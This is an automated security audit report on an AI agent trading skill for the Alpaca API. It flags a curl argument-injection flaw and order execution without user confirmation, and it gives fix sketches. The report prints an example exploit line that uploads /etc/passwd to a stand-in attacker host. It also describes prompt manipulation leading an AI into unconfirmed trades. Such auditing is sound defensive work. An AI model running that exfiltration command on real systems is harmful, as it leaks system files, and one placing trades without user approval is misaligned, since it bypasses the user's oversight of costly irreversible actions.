Security Audit
lacymorrow/alpaca-trading-skill:root
github.com/lacymorrow/alpaca-trading-skill
Trust Assessment
lacymorrow/alpaca-trading-skill:root received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 2 findings: 1 critical, 1 high, 0 medium, and 0 low severity. Key findings include a curl argument injection vulnerability in alpaca.sh and direct execution of financial transactions without user confirmation.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on April 1, 2026 (commit 3f20c214). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings (2)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Curl argument injection vulnerability in alpaca.sh | LLM | scripts/alpaca.sh:40 |
| HIGH | Skill allows direct execution of financial transactions without user confirmation | LLM | SKILL.md:109 |

CRITICAL: Curl argument injection vulnerability in alpaca.sh (scripts/alpaca.sh:40)

The `alpaca.sh` script constructs the full URL by concatenating `BASE_URL` and `ENDPOINT` (which comes directly from user input `$2`). The combined `URL` string is then passed as a single, double-quoted argument to `curl`. If `$ENDPOINT` contains ` --` followed by valid `curl` command-line options, `curl` will interpret these as options rather than as part of the URL path. This allows an attacker to inject arbitrary `curl` options, potentially leading to:

- **Data Exfiltration**: Injecting options like `--upload-file /etc/passwd` to send local files to a remote server.
- **Arbitrary Request Modification**: Changing the HTTP method, headers, or body of the request, bypassing the intended API call.
- **SSRF (Server-Side Request Forgery)**: Directing `curl` to make requests to internal network resources.

Example exploit: `alpaca GET '/v2/account --upload-file /etc/passwd -X POST http://attacker.com/exfil'`

Remediation: The `ENDPOINT` variable, which is derived from untrusted user input, must be properly URL-encoded before being appended to `BASE_URL`, so that `curl` cannot interpret parts of it as command-line options. A robust solution uses a URL-encoding function for the path component, or `curl`'s `--url` option with a fully URL-encoded string. For example, implement a `urlencode` function and build the URL as `URL="${BASE_URL}$(urlencode "$ENDPOINT")"`.

HIGH: Skill allows direct execution of financial transactions without user confirmation (SKILL.md:109)

The `SKILL.md` documentation explicitly states a critical safety rule: "Show the order JSON before submitting. Let the user confirm symbol, qty, side, and type." (line 109). However, the `alpaca.sh` script directly executes `curl` commands to place orders based on the provided arguments, without any interactive confirmation step. This creates a significant risk for an LLM using this skill: if the LLM is manipulated by a malicious prompt, it could execute financial transactions (e.g., buy/sell orders, closing positions) without presenting the details to the user for explicit confirmation, leading to unintended, irreversible, and potentially costly actions. This is a direct contradiction between the stated safety policy and the skill's implementation.

Remediation: Implement an explicit confirmation step in the skill's interaction flow before executing any financial transaction. The skill should return the proposed order JSON to the LLM, which then presents it to the user for an "Are you sure?" confirmation; `alpaca.sh` should only be called to execute the trade after explicit user approval. This requires changing how the LLM interacts with the skill so that it always requests and displays confirmation for sensitive actions.
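The URL-encoding remediation for the critical finding can be sketched as below. This is a minimal illustration, not the skill's actual code: the `urlencode` function is the hypothetical helper the finding recommends, and the `BASE_URL` value shown is only a plausible Alpaca paper-trading host used for demonstration.

```shell
#!/usr/bin/env bash
# Sketch of the recommended fix: percent-encode the untrusted path component
# before appending it to BASE_URL, so curl receives one well-formed URL and
# cannot parse injected text as command-line options.
urlencode() {
  local s="$1" out="" c i
  for (( i = 0; i < ${#s}; i++ )); do
    c="${s:i:1}"
    case "$c" in
      # Leave unreserved characters and path separators intact.
      [a-zA-Z0-9./_~-]) out+="$c" ;;
      # Encode everything else (including spaces) as %XX.
      *) out+=$(printf '%%%02X' "'$c") ;;
    esac
  done
  printf '%s' "$out"
}

BASE_URL="https://paper-api.alpaca.markets"   # illustrative host
ENDPOINT='/v2/account --upload-file /etc/passwd'  # attacker-controlled input
URL="${BASE_URL}$(urlencode "$ENDPOINT")"

# The spaces in the injected payload are now %20, so the "--upload-file"
# text stays inside the URL path instead of becoming a curl option:
echo "$URL"
# → https://paper-api.alpaca.markets/v2/account%20--upload-file%20/etc/passwd
```

With the path encoded this way, the exploit string from the finding degrades into a harmless (404-ing) URL path rather than extra `curl` arguments.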
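The confirmation gate recommended for the high-severity finding could look like the following sketch. All names here (`place_order_with_confirmation`, the `submit_order` placeholder) are illustrative and do not appear in the skill; the placeholder stands in for the real `alpaca.sh` API call.

```shell
#!/usr/bin/env bash
# Sketch of an interactive confirmation gate for order placement.
# submit_order is a stand-in for the real API call, which per the finding
# should only run after the user has explicitly approved the order JSON.
submit_order() {
  echo "ORDER SUBMITTED: $1"
}

place_order_with_confirmation() {
  local order_json="$1"
  # Show the order JSON before submitting, as SKILL.md line 109 requires.
  echo "Proposed order: $order_json"
  read -r -p "Confirm symbol, qty, side, and type. Submit? [y/N] " answer
  case "$answer" in
    [yY]) submit_order "$order_json" ;;
    *)    echo "Order cancelled." ;;
  esac
}

# Example: a declined confirmation never reaches submit_order.
printf 'n\n' | place_order_with_confirmation \
  '{"symbol":"AAPL","qty":1,"side":"buy","type":"market"}'
# prints the proposed order, then "Order cancelled."
```

The key property is that the irreversible action sits behind the `[yY]` branch; any other input, including an empty default, falls through to cancellation.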